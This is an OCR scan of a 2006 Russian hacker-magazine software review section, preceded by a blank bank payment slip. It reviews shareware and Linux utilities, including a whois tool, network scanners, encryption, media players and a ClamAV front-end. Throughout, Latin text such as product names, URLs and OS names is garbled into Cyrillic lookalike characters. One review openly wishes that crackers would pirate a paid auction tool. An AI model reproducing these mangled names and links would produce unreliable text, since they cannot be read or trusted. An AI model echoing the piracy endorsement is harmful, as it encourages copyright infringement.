Плательщик 


Адрес (с индексом) 


Назначение платежа 
Оплата за « 


» 


Сумма 


С 


200_ г. 





месяц 



Кассир 



Ф.И.О. 

Подпись плательщика 



Квитанция 



ИНН 7729410015 ООО «Гейм Лэнд» 

ЗАО ММБ 

р/с № 40702810700010298407 



к/с № 30101810300000000545 



БИ К 044525545 




КПП -772901001 


Плательщик 


Адрес (с индексом) 


Назначение платежа 




Сумма 


Оплата за « 


» 




С 


200_ г. 





месяц 



Ф.И.О. 



Кассир 



Подпись плательщика 



ТЕХТ ЗЮЕХ/ 5ІРЕХ°КЕАІ_. ХАКЕР. ВЦ / 
СЕЫТЫЕП / СЕМТЫЕП@ПЕАІ_.ХАКЕР.КІІ / 



_ипіІз 

5НАВЕѴѴАРЕ2 




ѴѴіпсІоѵѵз 95/98/М Е/ЫТ/2К/ХР 
ЗЬагеѵѵаге $29,95 
Зіге: 5,66 Мб 

ѵѵѵѵѵѵ.пехІир.сотЯехІАІоисІ/іпсІех.ЬІтІ 

Программа, скорее, интересная, чем полезная, 
с доступным, незамысловатым интерфейсом. 
Меня, во всяком случае, она очень заинтересо- 
вала. Ее основное и главное предназначение — 
читать компьютерным голосом всякие тексты: 
хоть из файлов, хоть с веб-страничек — короче, 
из любого источника, лишь бы можно было про- 
честь. Зачитанное «вслух» можно сохранить в 
качестве аудиофайла для дальнейшего прослу- 
шивания. На данном уровне развития цивилиза- 
ции и технологий синтезированные нажелезках 
голоса звучат не так, чтобы уж совсем естест- 
венно, но прогресс налицо. Предполагаю, что 
с течением времени голосовые технологии 
вырвутся на оперативный простор, и тогда про- 
клятые борцы за веселые золотые баблонги 
и копирайты совсем прикроют онлайновые 
библиотеки. Тексты можно зачитывать на анг- 
лийском, голландском, французском, немец- 
ком, итальянском, португальском, испанском 
языках. На данный момент в триальной версии 
программы напрочь отсутствует русский язык, 
но на сайте есть небольшой отрывочек, зачи- 
танный голосом некой Катерины. Вполне так 
сносно, между прочим. Из этого сделаем вывод: 
русский язык к программе прикрутить можно! 



ѴѴіпсІоѵѵз 98/Ме/І\ІТ 4/2000/ХР/2003/ХР/ 

64-Ыі Ебіііоп 
ЗЬагеѵѵаге 400 рублей 
(можно купить в Интернете) 

Зіге: 2,7 Мб 

ѵѵѵѵѵѵ.Іато5.ги/ИІез/5ѵѵ4.2Ір 

ЗтаПѴѴЬоіз — это точно такое же средство 
получения всей доступной информации о 
любом ІР-адресе, имени компьютера или 
домене, включая страну, штат или провин- 
цию, город, название компании-провай- 
дера, имя администратора и контактную 
информацию службы технической подде- 
ржки, как и любое из ныне существующих, 
только удобное и сделанное отечественны- 
ми парнями. ЗтаПѴѴЬоіз ловко автоматичес- 
ки находит информацию о компьютере вне 
зависимости от того, в какой части мира 
он распложен, и предоставляет эту инфор- 
мацию всего лишь за несколько секунд. 
ЗтаПѴѴЬоіз справится с задачей, даже если 
ІР-адресу не сопоставлено никакое имя, 
причем программа всегда опрашивает толь- 
ко нужную базу данных. Можно проверять 
имена и адреса точечно, можно списками, 
а можно проверять по маске. При необхо- 
димости программа работает через бранд- 
мауэр 30СК35. В общем, если тебе снится 
карьера сетевого детектива или обычного 
параноика — качай. Выведаешь все. 



ѴѴіпсІоѵѵз 98/Ме/І\ІТ4/2000/ХР/2003/ХР/64-Ы1 
ЕсІІІІоп 

ЗЬагеѵѵаге 400 рублей 
(можно купить в Интернете) 

Зіге: 3,1 Мб 

ѵѵѵѵѵѵ.Іатоз.ги/(ІІез/еп14.2Ір 

Еззепііаі ЫеІТооіз — это набор сетевых утилит 
для диагностики сетей и мониторинга сетевых 
соединений компьютера от того же производи- 
теля, что и ЗтаПѴѴЬоіз. У меня обе программы 
работают в паре каждодневно, вытеснив анало- 
гичный софт напрочь. В комплекте поставляются 
следующие «вкусности» (перечисляюподробно, 
чтобы не было дополнительных вопросов натему 
«а есть ли?»): 

ІМеіЗіаІ. Отображает список входящих и исхо- 
дящих соединений твоего компьютера, включая 
информацию по открытым ТСР- и ІЮР-портам, 
ІР-адресам и состоянию соединений. Возможна 
настройка системы предупреждений на входя- 
щие и исходящие соединения. 

РгосМоп. Отображает список запущенных 
процессов с полной информацией о нахожде- 
нии программы, производителе, Ю-процесса, 
загруженных модулях. С этим инструментом ты 
сможешь просмотреть статистику по потреб- 
лению процессорного времени, распознавать 
скрытые приложения, обрывать запущенные 
процессы и эффективнее управлять использо- 
ванием ресурсов компьютера. 



ХАКЕР 03 /87/ 06 



181 





ТгасеЯоиіе и Ріпд. Знакомые каждому утилиты, 
снабженные множеством функций и наглядным 
представлением результатов. 

РогіЗсап. Сканер ТСР-портов с расширенны- 
ми возможностями, позволяющий сканировать 
сеть на предмет активных портов. Этот инстру- 
мент сканирует как в обычном (полносвязном), 
так и в скрытом (ііаіі-ореп) режимах. 

ІМВЗсап. Сканер ЫеІВІОЗ — мощный и быстрый 
инструмент для исследования сетей. Может 
сканировать сеть в заданном диапазоне ІР- 
адресов и составлять список компьютеров, 
имеющих службу ЫеІВІОЗ, разделяемых ресур- 
сов и таблицу их имен. 

ВаѵѵЗоскеі. Наделяет возможностью устанав- 
ливать низкоуровневые соединения ТСР для 
выявления проблем с различными сетевыми 
службами. 

Зііагез. Контролирует и ведет отчет внешних 
подключений к разделяемым ресурсам компью- 
тера, а также предоставляет быстрый и легкий 
путь подключения к удаленным ресурсам. 
ІЧеіАисІІІ (ЫеІВІОЗ АисІІІІпд ТооІ). Позволяет про- 
водить различные проверки безопасности сети 
и/или отдельных компьютеров, на которых запу- 
щена служба доступа к разделяемым ресурсам 
по ЫеІВІОЗ. 

ЗІЧМРАисІіі. Продвинутый сканер ЗММР- 
устройств. Позволяет быстро локализовать 
ЗЫМР устройства в выбранном сетевом диа- 
пазоне и получить настраиваемую выборку 
данных от каждого из них. 

ЗузРІІез. Удобный редактор для пяти важных 
системных файлов: зегѵісез, ргоіосоі, пеіѵѵогкз, 
ііозіз, апсі Ітітозіз. 

ОідіЗесгеІ 2.0 Рго 




ѴѴІпсІоѵѵз 98/Ме/МТ4/2000/ХР/2003/ХР/64-Ы1 
ЕсІІІІоп 

Зііагеѵѵаге 700 рублей (можно купить в 
Интернете) 

Зіге: 2,4 Мб 
ѵѵѵѵѵѵ.іатоз.с 1 е/сІз 2 . 2 Ір 

ОідіЗесгеІ — это программа для шифрова- 
ния и передачи файлов. Софтина применяет 
стойкие и проверенные временем алгоритмы 
шифрования, чтобы создавать шифрованные 
архивы (в том числе и самораспаковываю- 
щиеоя .ехе архивы) и в безопасном режиме 
передавать их. ОідіЗесгеІ: также оперирует 
мощными и интеллектуальными механизмами 
сжатия файлов, то есть архивы ОідіЗесгеІ: в 
состоянии обеспечить и сжатие, и реальную 



защиту данных. Программа интегрируется в 
оболочку ѴѴІпсІоѵѵз и осуществляет полную 
поддержку бгад-апсі-сігор (перетаскивание 
файлов мышкой). Если есть нужда кому- 
то заслать шифрованные данные — на том 
конце ОідіЗесгеІ не нужен: все, что им нужно 
знать, — это пароль, которым защищен само- 
распаковывающийся архив. После того как 
верный пароль введен, файлы и папки извле- 
каются из архива автоматически. ОідіЗесгеІ 
также может использовать электронную почту 
для отправки файлов и отдельных текстовых 
сообщений в шифрованном виде. ОідіЗесгеІ 
позаботится о полном уничтожении инфор- 
мации файлов и папок, которые больше не 
нужны. Файлы удаляются, и их место на диске 
многократно перезаписывается по специаль- 
ному алгоритму, чтобы исключить возмож- 
ность восстановления данных. Программа 
была разработана и скомпилирована за 
пределами США, поэтому в ней исключена 
возможность несанкционированного досту- 
па к зашифрованным данным; отсутствует и 
мастер-ключ (расшифровка возможна толь- 
ко ключом, использованным при шифрова- 
нии). ОідіЗесгеІ не подпадает под экспорт- 
ные ограничения США. Файлы шифруются 
с использованием наиболее надежных алго- 
ритмов шифрования, которые не поддаются 
никаким видам криптоанализа, проводимого 
лучшими математиками мира: САЗТ (ключ 
128-Ьіі), ВІоѵѵіізіі (ключ 448-Ьіі), Тѵѵоіізіі (ключ 
256-Ьіі) и РупсІаеІ (известен еще как АЕЗ, 
ключ 256-ЬІІ). 




ІМеиігоп 1.03 

ѴѴІпсІоѵѵз 98/Ме/2000/ХР 
Ргееѵѵаге 
Зіге: 6 Кб 
іііір://кеіг.пеі 

Некий гражданин по имени ВоЬіп Кеіг (слава 
ему) изваял своими руками программный 
продукт, предназначенный для синхрониза- 
ции установленного на компьютере времени. 
Это такое устройство для точного измерения 
времени, основной частью которого является 
квантовый стандарт частоты. Роль «маятни- 
ка» в часах играют атомы. Частота, излучае- 
мая или поглощаемая атомами при их кван- 
товых переходах из одного энергетического 
состояния в другое, регулирует ход часов. 
Эта частота настолько стабильна, что кванто- 
вые часы позволяют измерять время точнее, 
чем астрономические методы. Погрешность 
хода лучших квантовых часов при тщатель- 
ном изготовлении и настройке составляет не 
более 1 секунды за несколько тысяч лет. Из 
скриншота сразу становится ясно, как про- 
грамма работает: запустив, выбираем из при- 



лагающегося обширного списка сервер для 
синхронизации, сравниваем, видим разницу, 
при необходимости синхронизируем локаль- 
ное время с «правильным» и опционально 
ставим галку на предмет автоматического 
выключения программы после успешной син- 
хронизации и такую же «галку» на предмет 
автоматической синхронизации при включе- 
нии. Просто, наглядно, удобно. Архив — 6 Кб. 
Снимаю перед автором шляпу. 








Х-5еіир Рго Ѵ8.0.100 



ѴѴІпсІоѵѵз 98/Ме/2000/ХР 
Зііагеѵѵаге $14,95 
Зіге: 3,9 Мб 
ѵѵѵѵѵѵ.х-зеіир.пеі 

Очередной мегаумный и супертолковый 
твикер или, как это принято говорить в при- 
личных гостях, профессиональная утилита 
для тонкой настройки (более 810 парамет- 
ров) всех операционных систем семейства 
ѴѴІпсІоѵѵз, в том числе детальная настройка 
таких виндовых столпов, как ѴѴІпсІоѵѵз Ехріогег, 
Іпіегпеі Ехріогег, интернет-пейджеров, паке- 
тов М3 Оііісе, серверных опций, сетевых 
параметров, безопасности системы и т.д. 
Интерфейс программы выполнен в привыч- 
ном стиле ѴѴІпсІоѵѵз Ехріогег. Имеется возмож- 
ность записывать проделанные изменения в 
РЕС-файл и затем перенести его на другие 
машины. Поддерживает детальные логи и 
позволяет пристегивать плагины. С помощью 
многочисленных плагинов можно значительно 
расширить и без того большие возможнос- 
ти по настройке ѴѴІпсІоѵѵз (плагины можно 
найти на домашней странице). В отличие от 
многих других подобных программ изменение 
настроек производится с помощью «масте- 
ра», с довольно подробным описанием изме- 
няемого параметра. На всякий случай имеет- 
ся возможность «отката». Для ненавидящих 
иностранные языки — Виззіап Іапдиаде раск 
в ассортименте. 

ѴиеЗсап 8.3 

ѴѴІпсІоѵѵз 95/98/М Е/МТ/2 К/ХР, Ыпих, МасОЗ 
Зііагеѵѵаге $49,95 
Зіге: 26 Мб 
ѵѵѵѵѵѵ.ііатгіск.сот 

На крпето.ги один добрый человек поделился 
с желающими суперпрограммой для владель- 
цев сканеров и сочувствующих. Программа 
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работает более чем с 430 различными моделями 
сканеров, среди которых модели таких извес- 
тных производителей, как НР, МіпоІІа, ІМІкоп, 
Роіагоіб, Ерзоп, Сапоп. ѴиеЗсап Рго поддержи- 
вает сканирование негативов, пакетный режим 
сканирования, автоматическую кадрировку, 
настройку цветового баланса и автоматическую 
цветокоррекцию, а также удаление дефектов 
изображения за счет канала инфракрасного 
сканирования и многопроходного сканирова- 
ния с последующим усреднением результата 
для подавления собственных шумов сканера. 
ѴиеЗсап может использоваться как с фильм- 
сканерами, так и с планшетниками. Одним из 
важных моментов является наличие функции 
многопроходного сканирования не зависимо от 
того, может это сканер или нет. Интересно то, 
что с помощью ѴиеЗсап возможно одновремен- 
но и сканировать, и обрабатывать другой файл 
в графическом редакторе. ѴиеЗсап поддержи- 
вает автоматическую и ручную настройку боль- 
шинства параметров и пакетный режим ска- 
нирования. Поддерживается около полусотни 
«ходовых» моделей сканеров с определенным 
перевесом в сторону слайд-сканеров — ІМІкоп, 
МіпоІІа, Роіагоіф Місгоіек, Ерзоп. Имеется раз- 
витая поддержка сканирования негативов (в 
программу включены параметры 150 негатив- 
ных пленок), пакетный режим сканирования, 
максимальное использование аппаратных воз- 
можностей сканера, сканирование пакета ори- 
гиналов с идентичными настройками. Имеются 
автоматическая кадрировка, настройка цвето- 
вого баланса и автоматическая цветокоррекция. 
Уникальными являются возможности управления 
временем экспозиции и фокусировкой сканера. 
Имеются фильтры подавления зерна, нерезкого 
маскирования и удаления паразитного оттенка 
оригинала. Есть средства ручной корректиров- 
ки динамического диапазона и градационной 
характеристики (независимо от каналов ВОВ). 
Предусмотрено переключение цветовых про- 
странств сканера, монитора и выходного файла. 
В целом программа обеспечивает возможность 
получить на выходе максимально качественное 
ВѲВ-изображение, доступное для аппаратных 
средств сканера. 

Ріиіоп 1.0 ТР 1 

ѴѴІпсІоѵѵз ХР 
Ргееѵѵаге 
Зіге: 1,3 Мб 
ІгНр://рІиІоп.озз.ги 

Ну, и на «сладкое» — из рубрики «Нам пишут». 
Пишут нам вот что: «Здравствуйте! Мы хоте- 
ли бы попросить Вас разместить в разделе 
зойѵгаге информацию о плеере Ріиіоп. Плеер 



распространяется абсолютно бесплатно, напи- 
сан на ОеІрЫ и имеет очень много оригинальных 
функций (например, может работать как с двумя 
внутренними движками, так и использовать вне- 
шние плееры). Поддерживает форматы трЗ, 
одд, и/та, есть революционно новая система 
поиска файлов, система защиты от сбоев, фун- 
кция интеллектуального копирования файлов... 
Нам очень хочется продвигать его, мы хотим, 
чтобы российские пользователи работали с 
российским софтом...» С последним очень даже 
согласен. Сходил на довольно толково сделан- 
ный сайт, скачал программу. Авторы правы, 
«Ріиіоп (Плутон) — плеер, построенный по 
принципу библиотеки, имеющий великолепный 
звук, три плей-листа, 16-полосный эквалайзер, 
режимы Оиіск РІау, Магк, ЗИиЛІе абб и другие 
полезные функции. Удобный и красивый интер- 
фейс с обширной системой настроек и строкой 
поиска». Все так и есть. Закачал в Ріиіоп всю 
свою музыку с винта, перелопатил, рассорти- 
ровал, воткнул и наслаждаюсь звуками, прият- 
ными моему израненному сердцу. Себе плеер 
оставлю и буду пользоваться. Авторам большое 
спасибо за проделанную работу и всеобщее 
уважение читателей ][. 
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ѴѴІпбоѵѵз 95/98/МЕ/Г\П72К/ХР 
Збагеѵѵаге 
Зіге: 2788 Кб 
ѵѵѵѵѵѵ.зсооіегзоііѵѵаге.сот 

Оиізоигсіпд — модное и прибыльное слово, 
только правды в нем маловато. Постоянная 
смена поставщиков ИТ-услуг не дает воз- 
можности наладить стабильные отношения. 
Непроверенные боем и временем работники так 
и норовят кидануть заказчика. Вот и приходится 
проверять каждый байт кода, приготовленный 
индийскими программерами: не уперли ли кусок 
программы из чужого продукта, написано ли все 
правильно, на месте ли комменты? Заниматься 
всем этим хозяйством вручную, если ты игра- 



ешь крутого ИТ-прораба, никак не катит. Нужна 
автоматизация, так как ты должен видеть, что же 
там набедокурили твои кодеры. Ты скармлива- 
ешь проге начальный материал для выявления 
всех изменений, проявившихся в конечной вер- 
сии. Все аккуратненько подчеркивается и взве- 
шивается, чтобы не переплатить, если заказ 
был определен конкретным объемом кода. Эта 
же прога отлично справляется со сравнением 
содержания твоего смартфона, ноута, флешки 
и основного компа. После сравнения синхрони- 
зация может быть проведена безболезненно. 
Теперь несчастный ИТ-прораб может спать спо- 
койно, постоянная смена рабочего пространс- 
тва не повредит целостности данных! 




10. НТМб Ітаде ЗрІІИег 2.40 

ѴѴІпбоѵѵз 95/98/МЕ/МТ/2К/ХР 
ЗІгагеѵѵаге 
Зіге: 1501 Кб 
ѵѵѵѵѵѵ.ітадесиге.сот 

Вывеска различных версий сайта а-Іа 
56/256/512 КЬ давно стала моветоном. 
Предполагается, что каждый сидит на мега- 
скоростном канале и вожделенно ждет «вол- 
шебного мира мультимедиа». Объективная 
реальность же такова, что многие все еще 
испытывают сложности при просмотре видео 
и тяжеленных картинок на страницах сайта. 
Именно для них, для все еще весомого числа 
твоих посетителей предлагается данная 
прога. Теперь даже самую тяжелую картинку 
можно распилить на кучу маленьких кусочков, 
так что желанное будет появляться постепен- 
но, эдаким графическим стриптизом. Здесь 
же подготовят желанный НТМІ_-код, который 
объединит все маленькие кусочки, избавит 
тебя от нудной вбивки тэгов. Несмотря на 
соблазн порезать большую картинку на тыся- 
чи маленьких, помни, что запрос на графи- 
ку тоже занимает некоторое время. Если ты 
готовишь действительно важный проект, то 
стоит обкатать тему, посмотреть при каком 
раскладе обеспечивается самая быстрая 
загрузка. 

ВеІказоЛ ІСО Нізіогу Ехігасйг Рго 2.02 

ѴѴІпбоѵѵз 95/98/2К/2003/ХР 
ЗІгагеѵѵаге 
Зіге: 1282 Кб 
ѵѵѵѵѵѵ.ЬеІказоІІ.сот 

Все течет, все меняется, даже разреклами- 
рованные прокладки не помогают... Однако 
уже много лет я пользуюсь одной и той же 
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читалкой для ІСО-хистори. Новой версии 
оной так и не объявилось, работа с МігапсГой 
не была добавлена. Тогда Белочный софт 
объявляет о выходе второй серии боевика 
— ІСО Нізіогу Ехігасіог, который овладеет 
хистори и выдаст текстовой файл (НТМІ_ 
или даже ХМІ_) Практически все версии аси 
поддерживаются, мне удалось расшифро- 
вать логи 1999 года, которые отказывалась 
подсасывать последняя версия инетного 
пейджера. Дополнительные комментарии 
оказываются излишними. Нужно во что бы 
то ни стало овладеть этой софтиной! 




ѴѴІпсІоѵѵз 95/98/МЕ/МТ/2К/ХР 
Збагеѵѵаге 
Зіге: 3346 Кб 
ѵѵѵѵѵѵ. хззоііѵѵаге . сот 

Не стоит обвинять меня в буржуйстве, когда 
я описываю исключительно капиталисти- 
ческую Ьід-тулзу. Именно эта феня поможет 
показать твоему заказчику/работодателю, 
как усердно и отчаянно ты бьешься за его 
драгоценные интересы при подготовке про- 
екта. Так, поход за буханкой хлеба и новым 
номером X будет обозначен софтиной как 
«Закупка расходных материалов на нужды 
проекта» и «Апгрейд базы знаний по ИТ». 
В мире больших денег порой важнее не 
работать, а эмулировать данное действие, 
облачать оное в самые радужные краски. 
На самом же деле софт окажется полезен и 
в настоящих делах. На ниве проект-менедж- 
мента я работал с М3 Ргоіесі и обыкновен- 
ным ЕхсеГем. Первый вызывает определен- 
ные сложности обилием функций и кно- 
почек — можно смело первые две недели 
проекта списывать на изучение темы. ЕхсеІ 
же иногда ограничивает твою фантазию, 
не предоставляет надлежащей чуткости 
настройки и ограничивает синхронизацию 
инфы, вносимой другими мемберами твоей 
бригады. Здесь же есть все нужные опции 
первого софта при неоценимой простоте 
второго. Мне очень понравилась фишка 
веб-репортов. Все действия моих бойцов, 
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а главное — стоимость проведенных работ 
была доступна 24/7 заказчику. Новой же 
заказчик может быть соблазнен деталями 
завершенных прежде работ. 




РаігВоІ 

ѴѴІпсІоѵѵз 98/2К/2003/ХР 
Збагеѵѵаге 
Зіге: 1500 Кб 
ѵѵѵѵѵѵ.ЬіпІеко.сот 

Помнишь, каким ипіітііеб-геморроем стал 
проигрыш на аукционе Остапа Бендера? 



Чтобы не уподобляться литературным пер- 
сонажам, но гнуть свою линию и выигрывать 
аукционы, скупая добро за копейки, поль- 
зуйся аукционным софтом. 

Большинство интернет-толкучек поддержи- 
вают опцию автоматического выдвижения 
предложений на товар до тех пор, пока не 
будет достигнут выделенный лимит. Многие 
думают, что этого достаточно... Наивные, 
ведь то, что доступно каждому, никогда не 
станет ключом к победе! Этой же хренью 
ты сможешь мониторить десятки позиций, 
выявляя самые выгодные варианты, ведь 
часто один и тот же товар предлагается 
барыгой как совершенно независимые 
позиции... Нас этой ботвой не проведешь, 
ведь цены можно будет удобно прослежи- 
вать через предлагаемые графики и диа- 
граммы. Тема умеет отслеживать и такие 
варианты. Как за Сережу Сыроежкина 
учился Электроник, так и за тебя будет сру- 
бать бабло этот автомат! 

Хочется верить, что коллеги-крэкеры 
однажды помогут о лекарством, так как 
даже за сладкую перспективу баснослов- 
ных барышей отдавать 100 бачков — дело 
безбожное! 

віндвѵ ѵоіін'з з; 





ТЕХТ ПЕТР СЕМИЛЕТОВ / ѴѴѴѴѴѴ.НОХТОЫ.КІЕѴ.ЦД / 



Ш ХѴѴАРЕ2 




КІатаѵ 

РОЗІХ (*В80, І_іпих, Зоіагіз...) 

Размер (исходник в Іаг.дф: 1,7 Мб. 
б11р://кІатаѵ.зоигсе(огде.пе1/кІатаѵѵѵікі/іпсІех. 
ркір/Маіп_Раде 
Лицензия: ѲІМІІ ѲРб 

КІатаѵ — графический фронт-энд к извест- 
ному антивирусу СІатаѵ. КІатаѵ заточен под 
КОЕ. Редко встретишь программу, которая 
начинается с буквы К и не заточена под КОЕ. 
Мне всегда хотелось иметь какой-нибудь 
фронт-энд для СІатаѵ, потому что писать 
опции его командной строки слишком долго, 
а делать какой-нибудь скрипт для упрощения 
этой задачи мне было лень. И вот мечта вроде 
бы сбылась. КІатаѵ! Наконец я могу выби- 
рать визуально, какие каталоги проверять, а 
какие — нет. Просто ставлю галочки. 

Кроме того, КІатаѵ может проверять запус- 
каемые и открываемые файлы на лету, но 
думаю, что это может быть актуально толь- 
ко для запускаемых через ѴѴІпе программ 
ѴѴІпбоѵѵз. Зараженные файлы КІатаѵ спо- 
собен перемещать в карантинный каталог. 
Как известно, СІатаѵ, а стало быть и КІатаѵ, 
файлы лечить не умеет. Лучший лекарь — это 
удаление. А насколько это гуманно — убивать 
файлы в карантине — решай сам. 

Еще КІатаѵ может обеспечить антивирус- 
ной защитой твой почтовый клиент. КІатаѵ 
делает такое для двух программ: КМаіІ и 
Еѵоіиііоп. Оценить эту возможность я не смог. 
Пользуюсь другим почтовиком. 

Интерфейс КІатаѵ состоит из ряда страниц- 
вкладок, каждая из которых может иметь, в 



свою очередь, вложенные вкладки. Несмотря 
на кажущийся поначалу хаос, после несколь- 
ких минут использования становится удобно 

— все под рукой, рядом. Есть даже страница 
браузера вирусов — можно получить опи- 
сание любого вируса из базы СІатаѵ, если 
такое описание есть на ѵігизіізі.сот . В качес- 
тве встроенного веб-браузера используется, 
разумеется, Коприегог. 

КІатаѵ сидит в трее. Он может обновлять 
антивирусные базы автоматически и выпол- 
нять проверку на вирусы по расписанию. Он 
русифицирован процентов на 80. Это поло- 
жительные стороны продукта. Отрицательные 

— пожалуй, подвергну критике только одно. 
Нельзя задавать маску файлов, чтобы про- 
верялись только файлы по такому-то шабло- 
ну. А ведь СІатаѵ поддерживает такую воз- 
можность, достаточно только использовать 
параметр «-іпсІибе=такой-то шаблон». И в 
какой-то степени использование консольно- 
го СІатаѵ приносит более скорый результат. 
Что мне толку от того, что КІатаѵ усердно 
проверяет все файлы подряд, включая своп 
ѴѴІпбоѵѵз или не менее здоровенные видео, 
звуковые и просто графические файлы высо- 
кого разрешения, с какими я работаю. 
Подведу итог. Хочешь удобный графический 
интерфейс для СІатаѵ, плюс встроенную 
защиту от вирусов для почтовика (что под *піх 
не столь уж важно) — ставь себе КІатаѵ. А 
хочешь иметь дело с командной строкой и 
кучей опций СІатаѵ — оставайся с СІатаѵ. 

Саісигзе 

РОЗІХ (*ВЗЭ, Ипих, Зоіагіз...) 

Размер (исходник в Іаг.дф: 106 Кб 
М1р://сиІоІ.огд/саІсигзе 
Лицензия: ОШ ОРІ_ 

Календарь, чей интерфейс основан на кон- 
сольной библиотеке РІсигзез. Просто так 
календарь — не очень интересное дело. 
Поэтому в Саісигзе реализованы планиров- 
щик задач и список ТООО. Все управление 
календарем осуществляется с помощью кла- 




виатуры. А клавиша ТАВ служит для пере- 
мещения между панелями распорядка дня, 
календаря и списка ТООО. Внизу экрана 
всегда есть подсказка, какие клавиши нажи- 
мать и в каком формате вводить данные (дату, 
время). Русский язык в записях, разумеется, 
поддерживается. 

Программа понравится тем линуксоидам, у 
которых очень старый компьютер, где біпих 
работает исключительно в консоли (даже нечто 
вроде РІцхЬох может серьезно тормозить на 
определенных компьютерах). А так — запус- 
каешь Саісигзе в отдельной консоли, и этот 
календарь там всегда под рукой. Удобно. 

ЕІМР 

РОЗІХ (*ВЗО, Еіпих, Зоіагіз...) 

Размер (исходник в Іаг.дф: 127 Кб 
Н11р://1гезИтеа1.пеі/ргоіес1з/и_т_р 
Лицензия: ѲШ ѲРб 

Математическая программа широкого круга 
использования. Содержит в себе графичес- 
кий интерфейс на основе ОТК и консольную 
утилиту іпііпег, о назначении которой я могу 
лишь догадываться, поскольку в момент напи- 
сания этих строк сайт программы не досту- 
пен, работает только ссылка на ЗоигсеРогде. 
А в дистрибутив документация не включена, 
кроме самой базовой по стандарту ОМЫ. 
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Для компиляции консольной версии ІІМР 
надо вместо обычного таке дать команду 
таке Іехі. Простейший способ использо- 
вания ІІМР — это калькулятор. В строке, 
расположенной внизу главного окна, ты 
вводишь алгебраическое выражение, нажи- 
маешь Епіег и получаешь результат. Можно 
пользоваться математическими функциями 
— зіп, соз и так далее, — использовать кон- 
станту рі, скобки, что угодно. 

Кроме того, ІІМР оснащена меню Тооіз, где ты 
найдешь много чего полезного. Это, во-пер- 
вых, традиционный «кнопочный» калькуля- 
тор. Простейший текстовый редактор нужен, 
если тебе понадобится что-то быстро запи- 
сать. Сложный калькулятор — это то окно, 
которое стартует главным по умолчанию. 
Еще одно встроенное средство — редактор 
матриц, который, возможно, пригодится тем, 
кто имеет дело с ЗЭ-графикой. Наконец, окно 
ѲгарЬ — средство построения двухмерных и 
трехмерных графиков. 

Итого. Отличная замена консольному Ьс, 
плюс полный набор дополнительных функ- 
ций, которые требуются людям точных наук. И 
все это за 127 килобайт сжатого исходника. 




Р08ІХ (*В8Э, І_іпих, Зоіагіз...) 

Размер (исходник в Іаг.Ь22): 242 Кб 
ПІІр ://Іі п их. Ьусід . огд/~уод і п/ 

Лицензия: ѲШ ОРІ_ 

Утилита, вдохновленная, видимо, программой 
ЫоПоп СІеапЗѵгеер. Предназначенадля поиска 
и удаления разных файлов, а именно: пустых 
файлов и каталогов, устаревших символичес- 
ких ссылок и пунктов меню, повторяющихся 
файлов, резервных копий и тому подобного. 
При запуске предлагается выбрать, какие 
именно файлы надо найти. Затем появляется 



список с найденными файлами и каталога- 
ми. Помечаешь их, нажимаешь кнопку №хІ, 
и они удаляются. Будь внимателен: найден- 
ные файлы выводятся в разных вкладках. 
Например, одна вкладка будет с пустыми 
файлами, другая — с «битыми» симлинками 
и так далее. При удалении файлов можешь 
поставить галочку на опции Сгеаіе Ьаскцр 
агсЬіѵе, и удаляемые файлы будут предвари- 
тельно сохранены в этом архиве. 

Если программа из исходника, то устанавли- 
вается она не совсем традиционно. Нужна 
утилита Зсопз. Если она есть, даем коман- 
ду зсопз, а потом — зсопз іпзіаіі. Если нет 
такой, то в комплект КІеапЗм/еер включена 
мини-версия Зсопз. Поэтому сначала запус- 
каем скрипт «./сопіідиге», который создает в 
каталоге исходника другой скрипт, на РуІІтоп. 
Называется он зсопз. Теперь даем такие 
команды: 

# ./зсопз 

# ./зсопз іпзіаіі 

А вот деинсталлировать из исходника не полу- 
чится. Автоматически. Вручную — пожалуйс- 
та, ищи файлы и удаляй, если программа не 
покажется тебе нужной. 




РОЗІХ (*ВЗЭ, Ипих, Зоіагіз...) 

Размер (исходник в 1аг.Ьг2): 2,2 Мб 
МІр://каІІеіпе.зоигсеІогде.пеІ 
Лицензия: ѲШ ѲРБ 

Этот видеоплеер — настоящий подарок 
пользователям рабочей среды КЭЕ. Сердце 
Каііеіпе — знаменитый движок Хіпе, лежа- 
щий в основе доброй половины мульти- 
медийных плееров под Ипих, начиная от 
Атагок и заканчивя Тоіет. Однако Каііеіпе 
может использовать в качестве движка еще 
и йзігеатег. 

Подобно Атагок, Каііеіп'у чуждо пристрас- 
тие к «шкуркам» — простое КОЕ'шное окно 
с тремя вкладками-табами и несколькими 
панелями управления, на одной из которых 
есть кнопка для создания скриншота из 
текущего фильма. 

На вкладке «Плей-лист» отображается, по 
сути, история воспроизведенных файлов. 
Для удобства вкладка плей-листа может 
быть вынесена в отдельное окно. Вкладка 
«Со!» оснащена кнопками для запуска 



ЭѴО, ѴібеоСЭ, открытия файла, ссылки 
и каталога. Во вкладке «Плеер» отобра- 
жается видео. А клавиша <Р> традицион- 
но переключает плеер в полноэкранный 
режим воспроизведения. 

Каііеіп, в отличие от Тоіет, предоставляет 
доступ ко всем настройкам движка Хіпе. Есть 
эффекты-фильтры от Хіпе. 

Есть еще подстройка яркости, цветов и тому 
подобного, а также тонкая настройка синхро- 
низации видео и звука. По твоему желанию 
Каііеіп встраивается в трей (как Атагок) при 
закрывании главного окна. 

Общие впечатления таковы. Отменный плеер. 
Интерфейс проще, чем у СХІпе (ближайшего 
к нему по духу и возможностям). Стабильность 
в последних версиях не вызывает нареканий. 
Удобный выбор режимов деинтерлейсинга. И 
вообще, ощущение от работы с этим плеером 
очень приятное. 




РОЗІХ (*В8Э, Біпих, Зоіагіз...) 

Размер (исходник в Іаг.дг): 256 Кб 
ННрѴ/рстапІт.зоигсеІогде.пеІ 
Лицензия: ѲІЧІІ ѲРІ_ 

Небольшой файловый менеджер, основан- 
ный на библиотеке виджетов ОТК. На первый 
взгляд РСІѴІап ЕІІе Мападег вызывает ощуще- 
ния, подобные тем, которые испытываешь, 
запустив ІМацІІІиз — та же вызывающая про- 
стота. Потом оказывается, что все не так 
просто: в нем реализован табовый интер- 
фейс, и в каждом табе можно открывать спи- 
сок файлов. Можно вывести дерево структу- 
ры каталогов — для этого на странице-вклад- 
ке появляется дополнительная панель. 
Реализован просмотр файлов некоторых гра- 
фических форматов в виде миниатюр. При 
запуске файлов на выполнение используют- 
ся МІМЕ-привязки, принятые в ОІМОМЕ. Есть 
закладки и традиционные функции работы с 
файлами и каталогами, кроме тех, что связа- 
ны с жесткими и символическими ссылками. 
Как будто программа не для Ыпих. Хотя окош- 
ко свойств, где можно изменять права досту- 
па, все же есть. Слабо развиты возможности 
выделения файлов — в наличии только два 
